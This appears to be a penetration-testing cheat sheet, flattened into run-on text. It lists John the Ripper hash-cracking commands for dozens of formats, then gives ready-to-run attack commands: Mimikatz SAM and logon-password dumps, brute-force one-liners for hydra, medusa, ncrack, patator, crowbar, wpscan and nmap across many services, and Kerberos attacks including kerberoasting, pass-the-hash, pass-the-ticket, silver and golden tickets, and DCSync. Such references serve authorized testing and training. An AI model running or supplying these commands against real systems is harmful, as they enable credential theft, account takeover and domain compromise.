username:$pdf$Standard*badad1e86442699427116d3e5d5271bc80a27814fc5e80f815efeef839354c5f*289ece9b5ce451a5d7064693dab3badf101112131415161718191a1b1c1d1e1f*16*34b1b6e593787af681a9b63fa8bf563b*1*1*0*1*4*128*-4*3*2 $ john hashes.txt $ john --format=pdf hashes.txt $ cat hashes.txt username:$pdf$Standard*badad1e86442699427116d3e5d5271bc80a27814fc5e80f815efeef839354c5f*289ece9b5ce451a5d7064693dab3badf101112131415161718191a1b1c1d1e1f*16*34b1b6e593787af681a9b63fa8bf563b*1*1*0*1*4*128*-4*3*2::::::: $ john hashes.txt $ john --format=pdf hashes.txt PHPASS-MD5 PHPASS MD5 ------------------------------ $ cat hashes.txt $H$9aaaaaSXBjgypwqm.JsMssPLiS8YQ00 $ john hashes.txt $ john --format=phpass-md5 hashes.txt $ cat hashes.txt username:$H$9aaaaaSXBjgypwqm.JsMssPLiS8YQ00 $ john hashes.txt $ john --format=phpass-md5 hashes.txt $ cat hashes.txt username:$H$9aaaaaSXBjgypwqm.JsMssPLiS8YQ00::::::: $ john hashes.txt $ john --format=phpass-md5 hashes.txt PHPS PHPS MD5 --------------------------------- $ cat hashes.txt $PHPS$433925$5d756853cd63acee76e6dcd6d3728447 $ john hashes.txt $ john --format=phps hashes.txt $ cat hashes.txt username:$PHPS$433925$5d756853cd63acee76e6dcd6d3728447 $ john hashes.txt $ john --format=phps hashes.txt $ cat hashes.txt username:$PHPS$433925$5d756853cd63acee76e6dcd6d3728447::::::: $ john hashes.txt $ john --format=phps hashes.txt PIX-MD5 PIX MD5 ------------------------ $ cat hashes.txt NuLKvvWGg.x9HEKO $ john hashes.txt $ john --format=pix-md5 hashes.txt $ cat hashes.txt username:NuLKvvWGg.x9HEKO $ john hashes.txt $ john --format=pix-md5 hashes.txt $ cat hashes.txt username:NuLKvvWGg.x9HEKO::::::: $ john hashes.txt $ john --format=pix-md5 hashes.txt PO POST OFFICE MD5 ------------------------------- $ cat hashes.txt 0c78bdef7d5448105cfbbc9aaa490a44550c41c11bab48f9dbd8203ed313eef0 $ john hashes.txt $ john --format=po hashes.txt $ cat hashes.txt username:0c78bdef7d5448105cfbbc9aaa490a44550c41c11bab48f9dbd8203ed313eef0 $ john hashes.txt $ john --format=po hashes.txt $ cat hashes.txt username:0c78bdef7d5448105cfbbc9aaa490a44550c41c11bab48f9dbd8203ed313eef0::::::: $ john hashes.txt $ john --format=po hashes.txt RAR - RAR ------------------ $ cat hashes.txt $rar3$*0*c9dea41b149b53b4*fcbdb66122d8ebdb32532c22ca7ab9ec*24 $ john hashes.txt $ john --format=rar hashes.txt $ cat hashes.txt username:$rar3$*0*c9dea41b149b53b4*fcbdb66122d8ebdb32532c22ca7ab9ec*24 $ john hashes.txt $ john --format=rar hashes.txt $ cat hashes.txt username:$rar3$*0*c9dea41b149b53b4*fcbdb66122d8ebdb32532c22ca7ab9ec*24::::::: $ john hashes.txt $ john --format=rar hashes.txt RAW MD4 RAW MD4 ---------------------------- $ cat hashes.txt 8a9d093f14f8701df17732b2bb182c74 $ john hashes.txt # Doesn't work. JTR detects hash as "LM DES". $ john --format=raw-md4 hashes.txt $ cat hashes.txt username:8a9d093f14f8701df17732b2bb182c74 $ john hashes.txt # Doesn't work. JTR detects hash as "LM DES". $ john --format=raw-md4 hashes.txt $ cat hashes.txt username:8a9d093f14f8701df17732b2bb182c74::::::: $ john hashes.txt # Doesn't work. JTR detects hash as "LM DES". $ john --format=raw-md4 hashes.txt RAW MD5 - RAW MD5 ---------------------------- $ cat hashes.txt 5a105e8b9d40e1329780d62ea2265d8a $ john hashes.txt # Doesn't work. JTR detects hash as "LM DES". $ john --format=raw-md5 hashes.txt $ cat hashes.txt username:5a105e8b9d40e1329780d62ea2265d8a $ john hashes.txt # Doesn't work. JTR detects hash as "LM DES". $ john --format=raw-md5 hashes.txt $ cat hashes.txt username:5a105e8b9d40e1329780d62ea2265d8a::::::: $ john hashes.txt # Doesn't work. JTR detects hash as "LM DES". $ john --format=raw-md5 hashes.txt RAW MD5 - UNICODE ----------------------------- $ cat hashes.txt 16c47151c18ac087cd12b3a70746c790 $ john hashes.txt # Doesn't work. JTR detects hash as "LM DES". $ john --format=raw-md5-unicode hashes.txt $ cat hashes.txt username:16c47151c18ac087cd12b3a70746c790 $ john hashes.txt # Doesn't work. JTR detects hash as "LM DES". $ john --format=raw-md5-unicode hashes.txt $ cat hashes.txt username:16c47151c18ac087cd12b3a70746c790::::::: $ john hashes.txt # Doesn't work. JTR detects hash as "LM DES". $ john --format=raw-md5-unicode hashes.txt RAW SAH1 RAW SHA-1 ------------------------------- $ cat hashes.txt A9993E364706816ABA3E25717850C26C9CD0D89D $ john hashes.txt $ john --format=raw-sha1 hashes.txt $ cat hashes.txt username:A9993E364706816ABA3E25717850C26C9CD0D89D $ john hashes.txt $ john --format=raw-sha1 hashes.txt $ cat hashes.txt username:A9993E364706816ABA3E25717850C26C9CD0D89D::::::: $ john hashes.txt $ john --format=raw-sha1 hashes.txt RAW SHA224 RAW - SHA-224 ---------------------------------- $ cat hashes.txt d63dc919e201d7bc4c825630d2cf25fdc93d4b2f0d46706d29038d01 $ john hashes.txt $ john --format=raw-sha224 hashes.txt $ cat hashes.txt username:d63dc919e201d7bc4c825630d2cf25fdc93d4b2f0d46706d29038d01 $ john hashes.txt $ john --format=raw-sha224 hashes.txt $ cat hashes.txt username:d63dc919e201d7bc4c825630d2cf25fdc93d4b2f0d46706d29038d01::::::: $ john hashes.txt $ john --format=raw-sha224 hashes.txt RAW SHA 256 RAW SHA-256 ------------------------------------ $ cat hashes.txt 5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8 $ john hashes.txt # Doesn't work. JTR detects hash as "Post.Office MD5". $ john --format=raw-sha256 hashes.txt $ cat hashes.txt username:5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8 $ john hashes.txt # Doesn't work. JTR detects hash as "Post.Office MD5". $ john --format=raw-sha256 hashes.txt $ cat hashes.txt username:5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8::::::: $ john hashes.txt # Doesn't work. JTR detects hash as "Post.Office MD5". $ john --format=raw-sha256 hashes.txt RAW SHA 384 - RAW - SHA-384 ----------------------------------- $ cat hashes.txt a8b64babd0aca91a59bdbb7761b421d4f2bb38280d3a75ba0f21f2bebc45583d446c598660c94ce680c47d19c30783a7 $ john hashes.txt $ john --format=raw-sha384 hashes.txt $ cat hashes.txt username:a8b64babd0aca91a59bdbb7761b421d4f2bb38280d3a75ba0f21f2bebc45583d446c598660c94ce680c47d19c30783a7 $ john hashes.txt $ john --format=raw-sha384 hashes.txt $ cat hashes.txt username:a8b64babd0aca91a59bdbb7761b421d4f2bb38280d3a75ba0f21f2bebc45583d446c598660c94ce680c47d19c30783a7::::::: $ john hashes.txt $ john --format=raw-sha384 hashes.txt RAW SHA 512 RAW SHA-512 --------------------------------------- $ cat hashes.txt b109f3bbbc244eb82441917ed06d618b9008dd09b3befd1b5e07394c706a8bb980b1d7785e5976ec049b46df5f1326af5a2ea6d103fd07c95385ffab0cacbc86 $ john hashes.txt $ john --format=raw-sha512 hashes.txt $ cat hashes.txt username:b109f3bbbc244eb82441917ed06d618b9008dd09b3befd1b5e07394c706a8bb980b1d7785e5976ec049b46df5f1326af5a2ea6d103fd07c95385ffab0cacbc86 $ john hashes.txt $ john --format=raw-sha512 hashes.txt $ cat hashes.txt username:b109f3bbbc244eb82441917ed06d618b9008dd09b3befd1b5e07394c706a8bb980b1d7785e5976ec049b46df5f1326af5a2ea6d103fd07c95385ffab0cacbc86::::::: $ john hashes.txt $ john --format=raw-sha512 hashes.txt $ cat hashes.txt $SHA512$fa585d89c851dd338a70dcf535aa2a92fee7836dd6aff1226583e88e0996293f16bc009c652826e0fc5c706695a03cddce372f139eff4d13959da6f1f5d3eabe $ john hashes.txt $ john --format=raw-sha512 hashes.txt $ cat hashes.txt username:$SHA512$fa585d89c851dd338a70dcf535aa2a92fee7836dd6aff1226583e88e0996293f16bc009c652826e0fc5c706695a03cddce372f139eff4d13959da6f1f5d3eabe $ john hashes.txt $ john --format=raw-sha512 hashes.txt $ cat hashes.txt username:$SHA512$fa585d89c851dd338a70dcf535aa2a92fee7836dd6aff1226583e88e0996293f16bc009c652826e0fc5c706695a03cddce372f139eff4d13959da6f1f5d3eabe::::::: $ john hashes.txt $ john --format=raw-sha512 hashes.txt SALTED SHA ---------------------------------- $ cat hashes.txt {SSHA}hHSEPW3qeiOo5Pl2MpHQCXh0vgfyVR/X $ john hashes.txt # Doesn't work. JTR detects hash as "OpenLDAP SSHA". $ john --format=salted-sha hashes.txt $ cat hashes.txt username:{SSHA}hHSEPW3qeiOo5Pl2MpHQCXh0vgfyVR/X $ john hashes.txt # Doesn't work. JTR detects hash as "OpenLDAP SSHA". $ john --format=salted-sha hashes.txt $ cat hashes.txt username:{SSHA}hHSEPW3qeiOo5Pl2MpHQCXh0vgfyVR/X::::::: $ john hashes.txt # Doesn't work. JTR detects hash as "OpenLDAP SSHA". $ john --format=salted-sha hashes.txt SAPB SAP BCODE ----------------------------------- $ cat hashes.txt ROOT $8366A4E9E6B72CB0 $ john hashes.txt $ john --format=sapb hashes.txt $ cat hashes.txt username:ROOT $8366A4E9E6B72CB0 $ john hashes.txt $ john --format=sapb hashes.txt $ cat hashes.txt username:ROOT $8366A4E9E6B72CB0::::::: $ john hashes.txt $ john --format=sapb hashes.txt SAPG SAP CODVN G (PASSCODE) -------------------------------------- $ cat hashes.txt ROOT $1194E38F14B9F3F8DA1B181F14DEB70E7BDCC239 $ john hashes.txt $ john --format=sapg hashes.txt $ cat hashes.txt username:ROOT $1194E38F14B9F3F8DA1B181F14DEB70E7BDCC239 $ john hashes.txt $ john --format=sapg hashes.txt $ cat hashes.txt username:ROOT $1194E38F14B9F3F8DA1B181F14DEB70E7BDCC239::::::: $ john hashes.txt $ john --format=sapg hashes.txt SHA 1 GEN GENERIC SHA-1 SALTED --------------------------------------- $ cat hashes.txt $SHA1p$salt$59b3e8d637cf97edbe2384cf59cb7453dfe30789 $ john hashes.txt $ john --format=sha1-gen hashes.txt $ cat hashes.txt username:$SHA1p$salt$59b3e8d637cf97edbe2384cf59cb7453dfe30789 $ john hashes.txt $ john --format=sha1-gen hashes.txt $ cat hashes.txt username:$SHA1p$salt$59b3e8d637cf97edbe2384cf59cb7453dfe30789::::::: $ john hashes.txt $ john --format=sha1-gen hashes.txt SSH ------------------------- $ cat hashes.txt $ssh2$2d2d2d2d2d424547494e204453412050524956415445204b45592d2d2d2d2d0a50726f632d547970653a20342c454e435259505445440a44454b2d496e666f3a204145532d3132382d4342432c35413830363832373943304634364539383230373135304133433245433631340a0a2f756954696e4a3452556a6f5a76302b705931694d763163695661724369347a2f62365a694c4161565970794a31685854327463692b593266334c61614578630a6f357772316141464d3437786d526d476f3832492f76434847413952786735776147433970574f475a5675555172447355367463556b434d422b325a344753390a354f44474364444b32674e6574446e62324a764873714154736d3443633633476468695a30734346594c71796d2b576531774359616c78734f3231572b4f676f0a42336f6746464977327232462b714a7a714d37415543794c466869357a476d7536534e6558765534477a784750464a4e47306d414f55497761614e3161446a630a4e326b3462437266796271337a366e436533444273384b3232694e2b3875526e534162434f717a5a5845645971555959354b6b6a326e654354525458494e64670a512b61535359673379355937626f4b6b6a494f727650555748654f796475512b74657273414577376e43564a7a72394e387452673271563450557631434b66700a4f49467742372f39736f6d6a59496a71576f61537a6a784b30633852777a305331706d722b7571726277792b50656f75354d3373656d486c426b4769553237660a776f684b792b4d554e4862734e6a7973535a53456c4e4b734d4950715449567a5a45316d5646412f30754d477164705133627a424f6a58325a6f36656446434f0a6d4a34775961765735774d2b6a6d75564b5056564e7939395a78796570304645644c50354b623263345a6c3053396631342f62366836415069785665377a75760a5662536b4279664a6e797a68494f5942497954374d64773134723441584a56362b5a6f457730397769774d3d0a2d2d2d2d2d454e44204453412050524956415445204b45592d2d2d2d2d0a*771 $ john hashes.txt $ john --format=ssh hashes.txt $ cat hashes.txt username:$ssh2$2d2d2d2d2d424547494e204453412050524956415445204b45592d2d2d2d2d0a50726f632d547970653a20342c454e435259505445440a44454b2d496e666f3a204145532d3132382d4342432c35413830363832373943304634364539383230373135304133433245433631340a0a2f756954696e4a3452556a6f5a76302b705931694d763163695661724369347a2f62365a694c4161565970794a31685854327463692b593266334c61614578630a6f357772316141464d3437786d526d476f3832492f76434847413952786735776147433970574f475a5675555172447355367463556b434d422b325a344753390a354f44474364444b32674e6574446e62324a764873714154736d3443633633476468695a30734346594c71796d2b576531774359616c78734f3231572b4f676f0a42336f6746464977327232462b714a7a714d37415543794c466869357a476d7536534e6558765534477a784750464a4e47306d414f55497761614e3161446a630a4e326b3462437266796271337a366e436533444273384b3232694e2b3875526e534162434f717a5a5845645971555959354b6b6a326e654354525458494e64670a512b61535359673379355937626f4b6b6a494f727650555748654f796475512b74657273414577376e43564a7a72394e387452673271563450557631434b66700a4f49467742372f39736f6d6a59496a71576f61537a6a784b30633852777a305331706d722b7571726277792b50656f75354d3373656d486c426b4769553237660a776f684b792b4d554e4862734e6a7973535a53456c4e4b734d4950715449567a5a45316d5646412f30754d477164705133627a424f6a58325a6f36656446434f0a6d4a34775961765735774d2b6a6d75564b5056564e7939395a78796570304645644c50354b623263345a6c3053396631342f62366836415069785665377a75760a5662536b4279664a6e797a68494f5942497954374d64773134723441584a56362b5a6f457730397769774d3d0a2d2d2d2d2d454e44204453412050524956415445204b45592d2d2d2d2d0a*771 $ john hashes.txt $ john --format=ssh hashes.txt $ cat hashes.txt username:$ssh2$2d2d2d2d2d424547494e204453412050524956415445204b45592d2d2d2d2d0a50726f632d547970653a20342c454e435259505445440a44454b2d496e666f3a204145532d3132382d4342432c35413830363832373943304634364539383230373135304133433245433631340a0a2f756954696e4a3452556a6f5a76302b705931694d763163695661724369347a2f62365a694c4161565970794a31685854327463692b593266334c61614578630a6f357772316141464d3437786d526d476f3832492f76434847413952786735776147433970574f475a5675555172447355367463556b434d422b325a344753390a354f44474364444b32674e6574446e62324a764873714154736d3443633633476468695a30734346594c71796d2b576531774359616c78734f3231572b4f676f0a42336f6746464977327232462b714a7a714d37415543794c466869357a476d7536534e6558765534477a784750464a4e47306d414f55497761614e3161446a630a4e326b3462437266796271337a366e436533444273384b3232694e2b3875526e534162434f717a5a5845645971555959354b6b6a326e654354525458494e64670a512b61535359673379355937626f4b6b6a494f727650555748654f796475512b74657273414577376e43564a7a72394e387452673271563450557631434b66700a4f49467742372f39736f6d6a59496a71576f61537a6a784b30633852777a305331706d722b7571726277792b50656f75354d3373656d486c426b4769553237660a776f684b792b4d554e4862734e6a7973535a53456c4e4b734d4950715449567a5a45316d5646412f30754d477164705133627a424f6a58325a6f36656446434f0a6d4a34775961765735774d2b6a6d75564b5056564e7939395a78796570304645644c50354b623263345a6c3053396631342f62366836415069785665377a75760a5662536b4279664a6e797a68494f5942497954374d64773134723441584a56362b5a6f457730397769774d3d0a2d2d2d2d2d454e44204453412050524956415445204b45592d2d2d2d2d0a*771::::::: $ john hashes.txt $ john --format=ssh hashes.txt SYBASEASE -------------- $ cat hashes.txt 0xc0074BE393C06BE420AD541671aa5e6f1a19a4a73bb51c59f45790f0887cfb70e0599747c6844d4556b3 $ john hashes.txt $ john --format=sybasease hashes.txt $ cat hashes.txt username:0xc0074BE393C06BE420AD541671aa5e6f1a19a4a73bb51c59f45790f0887cfb70e0599747c6844d4556b3 $ john hashes.txt $ john --format=sybasease hashes.txt $ cat hashes.txt username:0xc0074BE393C06BE420AD541671aa5e6f1a19a4a73bb51c59f45790f0887cfb70e0599747c6844d4556b3::::::: $ john hashes.txt $ john --format=sybasease hashes.txt XSHA MAC OS X 10.4+ SALTED SHA 1 ---------------------------------------- $ cat hashes.txt 12345678F9083C7F66F46A0A102E4CC17EC08C8AF120571B $ john hashes.txt $ john --format=xsha hashes.txt $ cat hashes.txt username:12345678F9083C7F66F46A0A102E4CC17EC08C8AF120571B $ john hashes.txt $ john --format=xsha hashes.txt $ cat hashes.txt username:12345678F9083C7F66F46A0A102E4CC17EC08C8AF120571B::::::: $ john hashes.txt $ john --format=xsha hashes.txt ZIP ---------------------- $ cat hashes.txt $zip$*0*1*8005b1b7d077708d*dee4 $ john hashes.txt $ john --format=zip hashes.txt $ cat hashes.txt username:$zip$*0*1*8005b1b7d077708d*dee4 $ john hashes.txt $ john --format=zip hashes.txt $ cat hashes.txt username:$zip$*0*1*8005b1b7d077708d*dee4::::::: $ john hashes.txt $ john --format=zip hashes.txt

Crack SSH Key Password

python sshng2john.py ~/.ssh/id_rsa.key python sshng2john.py ~/.ssh/id_rsa.key > hash.txt john --wordlist=rockyou.txt hash.txt

Mimikatz Commands

# DUMP WINDOWS SAM DATABASE mimikatz.exe # Check you have priv needed priviledge::debug # Elevate security token from high to system token::elevate # Dump the contents of the SAM database lsadump::sam # DUMP CACHED CREDENTIALS mimikatz.exe privilege::debug # Dump creds and hashes of all logged on users sekurlsa::logonpasswords

Medusa Brute Forcing

medusa -h 10.0.0.1 -u admin -P /usr/share/wordlists/rockyou.txt -M http -m DIR:/admin # -h is the target host # -u is the username # -P is the password file # -M is the authentication scheme # -m is the URI exectension # -d cant be used to brute force other protocols # SSH BRUTE medusa -u rosborne -P /usr/share/seclists/Passwords/probable-v2-top207.txt -h 10.0.0.1 -M ssh -n 22 # TELNET BRUTE medusa -u rosborne -P pass.lst -h 10.0.0.1 -M telnet # FTP BRUTE medusa -H hosts.txt -U user.txt -P pass.txt -M ftp -T 1 medusa -M ftp -C userpass.txt # SMB BRUTE medusa -h 10.0.0.1 -U user.txt -P pass.lst -M smbnt # MSSQL BRUTE medusa -h 10.0.0.1 –U user.txt –P pass.lst –M mssql # MySQL BRUTE medusa -h 10.0.0.1 -u rosborne -P pass.lst -f -t 3 -M mysql # PostGreSQL medusa -h 10.0.0.1 –U user.txt –P pass.lst –M postgres # VNC BRUTE medusa -h 10.0.0.1 –u root -P pass.lst –M vnc

Ncrack Brute Forcing

# SSH BRUTE ncrack -p 22 --user rosborne -P pass.lst 10.0.0.1 -T 5 # TELNET BRUTE ncrack -U user.txt –P pass.lst 10.0.0.1:23 # FTP BRUTE ncrack -U user.txt -P pass.lst ftp://10.10.0.1 # SMB BRUTE ncrack –U user.txt -P pass.lst 10.0.0.1 –p 445 # PostGreSQL ncrack –v –U user.txt –P pass.lst 10.0.0.1:5432 # RDP BRUTE ncrack -vv --user rosborne -P pass.lst rdp://10.0.0.1 # VNC BRUTE ncrack -V --user root -P pass.lst 10.0.0.1:5900

Patator Brute Forcing

# TELNET BRUTE patator telnet_login host=10.0.0.1 inputs='FILE0\\nFILE1' 0=user.txt 1=pass.txt persistent=0 prompt_re='Username: | Password:' # FTP BRUTE patator ftp_login host=10.0.0.1 user=FILE0 password=FILE1 0=usernames.txt 1=passwords.txt # PostGreSQL patator pgsql_login host=10.0.0.1 user=FILE0 0=user.txt password=FILE1 1=pass.lst # OracleSQL # pip3 install cx_Oracle --upgrade patator oracle_login sid=$SID host=10.0.0.1 user=FILE0 password=FILE1 0=user.txt 1=pass.lst -x ignore:code=ORA-01017 # VNC BRUTE patator vnc_login host=10.0.0.1 password=FILE0 0=pass.lst –t 1 –x retry:fgep!='Authentication failure' --max-retries 0 –x quit:code=0

WordPress Brute Forcing

wpscan --url http://10.0.0.1/wp-parent --usernames wpuser.lst --passwords /usr/share/wordlists/rockyou.txt

Crowbar Brute Forcing

crowbar -b rdp -s 10.0.0.1/32 -u admin -C passwordlist.txt -n 1 # -b is the protocol # -s is the target # -u is the username # -C is the word list # -n is number of threads

Hydra Brute Forcing

# Hydra http-form-post Help hydra http-form-post -U | less # View target webpage form data curl -sL http://10.0.0.1 # Use above info to brute force the HTTP POST Form hydra 10.0.0.1 http-form-post "/form/frontpage.php:user=admin&pass=^PASS^:INVALID LOGIN" -l admin -P /usr/share/wordlists/rockyou.txt -vV -f # -l is the user # -P is the wordlist # -f stop attack on first successful result # -vV really verbose # SSH BRUTE hydra -s <port> -l <username> -P /usr/share/wordlists/rockyou.txt <ip> -t <number of threads up to 16> -V ssh # TELNET BRUTE hydra -L usernames.txt -P passwords.txt 10.0.0.1 telnet -V # FTP BRUTE hydra -L user.txt -P pass.txt 10.0.0.1 ftp -V -e nsr # SMB BRUTE hydra -L usernames.txt -P passwords.txt 10.0.0.1 smb -V -f # MSSQL BRUTE hydra -L user.txt –P pass.txt 10.0.0.1 mssql # MySQL BRUTE hydra -L usernames.txt -P passwords.txt 10.0.0.1 mysql -V -f # PostGreSQL hydra -L usernames.txt -P passwords.txt 10.0.0.1 postgres -V # IMAP BRUTE hydra -l USERNAME -P /path/to/passwords.txt -f 10.0.0.1 imap -V hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 993 -f 10.0.0.1 imap -V # SMTP BRUTE hydra -l rosborne -P pass.lst 10.0.0.1 smtp -V hydra -l rosborne -P pass.lst -s 587 10.0.0.1 -S -v -V # POP BRUTE hydra -l rosborne -P pass.lst -f 10.0.0.1 pop3 -V hydra -S -v -l rosborne -P pass.lst -s 995 -f 10.0.0.1 pop3 -V # RDP BRUTE hydra -V -f -L user.txt -P pass.lst rdp://10.0.0.1 # VNC BRUTE hydra -P passwords.txt 10.0.0.1 vnc -V # SNMP hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt server.osbornepro.com snmp # ELASTICSEARCH BRUTE hydra -L users.txt -P password.lst 10.0.0.1 -s 9200 http-get / # DOCKER REGISTRY BRUTE hydra -L users.txt -P password.lst 10.0.0.1 -s 5000 https-get /v2/ # REDIS BRUTE hydra –P pass.txt redis://10.0.0.1:6379

Kerberoast and TGT

# KERBEROASTING # Request a service ticket using SPN name Add-Type -AssemblyName System.IdentityModel New-Object -TypeName System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'HTTP/spn-name.osbornepro.com' # Use Mimikatz to download above commands generated service ticket to disk kerberos::list /export # Use kerberoast apt package to attempt decrypting the ticket python /usr/share/kerberoast/tgsrepcrack.py /usr/share/wordlists/rockyou.txt /var/ftp/1-40a50000-osbornepro@HTTP~spn-name.osbornepro.com-OSBORNEPRO.COM.kirbi #---------------------------------------------- # OVERPASS THE HASH # Obtain kerberos ticket without performing NTLM auth over the network # This will open a new powershell session as the rosborne user sekurlsa::pth /user:rosborne /domain:osbornepro.com /ntlm:theNTLMHash /run:PowerShell.exe # Authenticate to a network share on a DC to generate a TGT net use \\dc01 # List newly requested kerberos tickets. TGT and TGS are obtained for the CIFS service klist # Open cmd on DC01 as rosborne by reusing the kerberos TGT .\psexec.exe \\dc01 cmd.exe #---------------------------------------------- # PASS THE TICKET # Create a Kerberos TGT using an NT hash python3 getTGT.py -hashes aad3b435b51404eeaad3b435b51404ee:B65039D1C0359FA797F88FF06296118F osbornepro.com/rosborne # Copy the ticket to /tmp/krb5cc_0 cp user.ccache /tmp/krb5cc_0 # Set the KRB5CCNAME environment variable to the ticket location export KRB5CCNAME=/tmp/krb5cc_0 #---------------------------------------------- # SILVER TICKET METHOD # Get User SID $SID = ([System.Security.Principal.WindowsIdentity]::GetCurrent()).User.Value # Open Mimikatz Tool mimikatz.exe # Flush any existing kerberos tickets kerberos::purge kerberos::list # Obtain Silver Ticket kerberos::golden /user:rosborne /domain:osbornepro.com /sid:$SID /target:web.osbornepro.com /service:HTTP /rc4:<Password hash of iis service service account> /ptt # /ptt injects this into memory # A new service ticket for the SPN has been loaded into Memory. Mimikatz set appropriate group permissions in the forged ticket #---------------------------------------------- # GOLD TICKET METHOD # Extract the password of krbtgt with Mimikatz. This will need to be run on a domain controller mimikatz.exe lsadump::lsa /patch # OR lsadump::dcsync /user:krbtgt # Creating the Golden Ticket and injecting it into memory does not require any admin privileges mimikatz.exe kerberos::purge # Create the golden ticket kerberos::golden /user:fakeuser /domain:osbornepro.com /sid:S-1-5... /krbtgt:<password hash> /ptt # The UserID is set to 500 by default which is the RID of the Administrator for the domain # The GroupID values are set by default to the most privileged groups in AD # Access to remote computers requires the use of the computers hostname # Using an IP Address will force NTLM authentication and not use the ticket #---------------------------------------------- # DC SYNC METHOD # Dump the password hashes of every account in the AD domain without logging in to a domain controller mimikatz.exe # Start replication, the /user option defines the target user to sync lsadump::dcsync /user:Administrator # OR lsadump::dcsync /domain:osbornepro.com /user:rosborne # PowerShell Function to Force Replication Function Replicate-AllDomainController { (Get-ADDomainController -Filter *).Name | Foreach-Object {repadmin /syncall $_ (Get-ADDomain).DistinguishedName /e /A | Out-Null} Start-Sleep 10; Get-ADReplicationPartnerMetadata -Target "$env:USERDNSDOMAIN" -Scope Domain | Select-Object -Property Server, LastReplicationSuccess } # End Function Replicate-AllDomainController

Nmap Brute Forcing

# SMB BRUTE nmap --script smb-brute -p 445 10.0.0.1 # SNMP BRUTE nmap -sU --script snmp-brute 10.0.0.1 --script-args snmp-brute.communitiesdb=wordlist.txt # RSYNC BRUTE nmap -sV --script rsync-brute --script-args userdb=user.txt,passdb=pass.lst -p 873 10.0.0.1 # REDIS BRUTE nmap --script redis-brute -p 6379 10.0.0.1 # SOCKS BRUTE nmap -vvv -sCV --script socks-brute --script-args userdb=user.txt,passdb=pass.lst,unpwndb.timelimit=30m -p 1080 10.0.0.1 # MSSQL BRUTE nmap -p 1433 --script ms-sql-brute --script-args mssql.domain=osbornepro.com,userdb=user.txt,passdb=pass.lst,ms-sql-brute.brute-windows-accounts 10.0.0.1 # PostGreSQL BRUTE nmap -sV --script pgsql-brute --script-args userdb=user.txt,passdb=pass.lst -p 5432 10.0.0.1 # MONGO BRUTE nmap -sV --script mongodb-brute -n -p 27017 10.0.0.1 # ORACLE SQL nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=<SID> <IP> # Offline Oracle SQL Hash Brute Force nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n 10.0.0.1 # IMAP BRUTE nmap -sV --script imap-brute -p 143 10.0.0.1 # VNC BRUTE nmap -sV --script pgsql-brute --script-args userdb=user.txt,passdb=pass.lst -p 5432 10.0.0.1 # LDAP BRUTE nmap --script ldap-brute -p 389 10.0.0.1 # IRC BRUTE nmap -sV --script irc-brute,irc-sasl-brute --script-args userdb=users.txt,passdb=/pass.lst -p <PORT> 10.0.0.1 # iSCSI BRUTE nmap -sV --script iscsi-brute --script-args userdb=usernames.txt,passdb=pass.lst -p 3260 10.0.0.1 # CASSANDRA BRUTE nmap --script cassandra-brute -p 9160 10.0.0.1 # AFP BRUTE nmap -p 548 --script afp-brute 10.0.0.1 # AJP BRUTE nmap --script ajp-brute -p 8009 10.0.0.1